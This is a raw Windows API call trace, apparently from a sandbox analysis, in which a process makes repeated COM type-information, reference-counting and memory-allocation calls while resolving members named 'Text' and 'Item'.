IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.714] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.714] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.714] GetCurrentProcess () returned 0xffffffffffffffff [0045.714] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.714] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.714] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.714] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.714] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.714] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.715] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.715] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.715] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.715] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.715] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.715] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.715] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.715] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.715] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.715] IUnknown:Release (This=0x8137308) returned 0x1 [0045.715] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.715] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.715] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.715] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.715] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.715] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.715] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x3b13b60 | out: ppTypeAttr=0x204508, pDummy=0x3b13b60*=0x4) returned 0x0 [0045.715] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.715] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.715] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.715] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.715] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.715] GetCurrentProcess () returned 0xffffffffffffffff [0045.715] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.715] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.715] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.716] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.716] IMalloc:Realloc (This=0x7feff045380, pv=0x7d55c50, cb=0x60) returned 0x813f060 [0045.716] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x40d0000 [0045.716] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.716] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.717] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.717] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.717] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.717] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.717] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.717] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.717] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.717] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.717] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.717] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.717] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.717] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.717] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.717] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.717] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.718] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.718] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.718] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.718] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.718] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.718] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.718] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.718] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.718] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.718] GetCurrentProcess () returned 0xffffffffffffffff [0045.718] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.718] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.718] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.718] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.718] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.718] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.718] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.718] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.719] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.719] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.719] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.719] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x40d0700 | out: ppTypeAttr=0x204948, pDummy=0x40d0700*=0x4) returned 0x0 [0045.719] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.719] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.719] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.719] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.719] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.719] GetCurrentProcess () returned 0xffffffffffffffff [0045.719] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.719] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.719] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.719] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.719] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.719] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.719] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.719] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.719] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.719] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.719] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.719] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.720] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.720] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.720] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.720] IUnknown:Release (This=0x8137308) returned 0x1 [0045.720] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.720] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.720] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.720] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.720] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.720] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.720] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x40d0980 | out: ppTypeAttr=0x204738, pDummy=0x40d0980*=0x4) returned 0x0 [0045.720] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.720] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.720] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.720] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.720] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.720] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.720] GetCurrentProcess () returned 0xffffffffffffffff [0045.720] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.720] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.720] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.720] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.720] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.720] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.720] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.721] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.721] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.721] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.721] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.721] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x40d0c80 | out: ppTypeAttr=0x204a18, pDummy=0x40d0c80*=0x4) returned 0x0 [0045.721] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.721] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.721] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.721] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.721] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.721] GetCurrentProcess () returned 0xffffffffffffffff [0045.721] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.721] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.721] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.721] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.721] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.721] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.721] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.721] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.721] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.721] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.721] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.721] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.721] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.722] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.722] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.722] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.722] IUnknown:Release (This=0x8137308) returned 0x1 [0045.722] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.722] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.722] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.722] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.722] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.722] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.722] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x40d0f00 | out: ppTypeAttr=0x204508, pDummy=0x40d0f00*=0x4) returned 0x0 [0045.722] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.722] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.722] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.722] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.722] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.722] GetCurrentProcess () returned 0xffffffffffffffff [0045.722] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.722] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.722] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.722] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.722] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.722] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.723] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.723] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.723] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.723] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.723] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.723] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.723] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.723] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.723] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.723] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.723] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.723] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.723] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.723] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.723] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.723] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.723] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.723] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.724] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.724] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.724] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.724] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.724] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.724] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.724] GetCurrentProcess () returned 0xffffffffffffffff [0045.724] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.724] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.724] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.724] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.724] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.724] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.724] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.724] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.724] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.724] IUnknown:QueryInterface (in: This=0x7f723a0, 